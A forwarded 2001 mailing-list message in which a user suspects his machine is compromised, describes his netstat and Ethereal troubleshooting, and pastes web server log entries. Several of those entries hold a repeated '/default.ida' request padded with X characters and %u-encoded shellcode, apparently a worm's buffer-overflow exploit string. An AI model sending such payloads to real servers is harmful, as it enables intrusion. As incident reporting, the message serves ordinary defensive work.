---------- Forwarded Message ----------
there's more though. but again i'm not sure.. for the first time i've seen a few odd requests being logged in boa, just a small snippet: [07/Aug/2001:06:26:03 +0000] request from 195.38.105.70 "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u780 1%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" ("/var/www/default.ida"): document open: No such file or directory [07/Aug/2001:07:13:08 +0000] bogus HTTP version: " HTTP/1.0" [07/Aug/2001:07:43:15 +0000] bogus HTTP version: " HTTP/1.0" [07/Aug/2001:07:59:05 +0000] malformed request: "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b %u53ff%u0078%u0000%u00=a HTTP/1.1" [07/Aug/2001:08:17:28 +0000] request from 195.38.44.138 "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u780 1%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" ("/var/www/default.ida"): document open: No such file or directory [07/Aug/2001:08:31:51 +0000] bogus HTTP version: " HTTP/1.0" [07/Aug/2001:08:57:30 +0000] bogus HTTP version: " HTTP/1.0" [07/Aug/2001:09:08:55 +0000] bogus HTTP version: " HTTP/1.0" [07/Aug/2001:09:13:38 +0000] bogus HTTP version: " HTTP/1.0" [07/Aug/2001:09:20:26 +0000] bogus HTTP version: " HTTP/1.0" [07/Aug/2001:09:29:23 +0000] bogus HTTP version: " HTTP/1.0" this all seems rather coincedential.. and seems to confirm my idea of being infected with a virus/worm.. hope this helps (me, heh.. :) On Tuesday 07 August 2001 18:40, William Leese wrote: > I think my machine has been compromised though i'm not entirely sure. > > I suddenly saw a reasonable amount of traffic when I wasn't going anything > that could generate it so I turned off all the net connection using > applications and still there was traffic. > > Opened top to see if there was a process that wasn't terminated yet, nope.. > that wasn't it. > > Turned off networking. > > Tried netstat -ap and found to my great dismay that inetd had started the > ftp service or atleast that port was available. I accidentally installed > wu-ftp awhile ago but i thought i had removed it.. oh well. So, commented > it out and restarted inetd. > > no luck.. the moment i started the networking script there was traffic. > > Turned off networking. But not before using Ethereal to capture a few > packets. > > I've added an attachment with the log, could someone take a look at it and > tell me what could be causing this.. it would seem like something (a worm > or virus) is scanning the network looking for (vulnerable?) computers. -------------------------------------------------------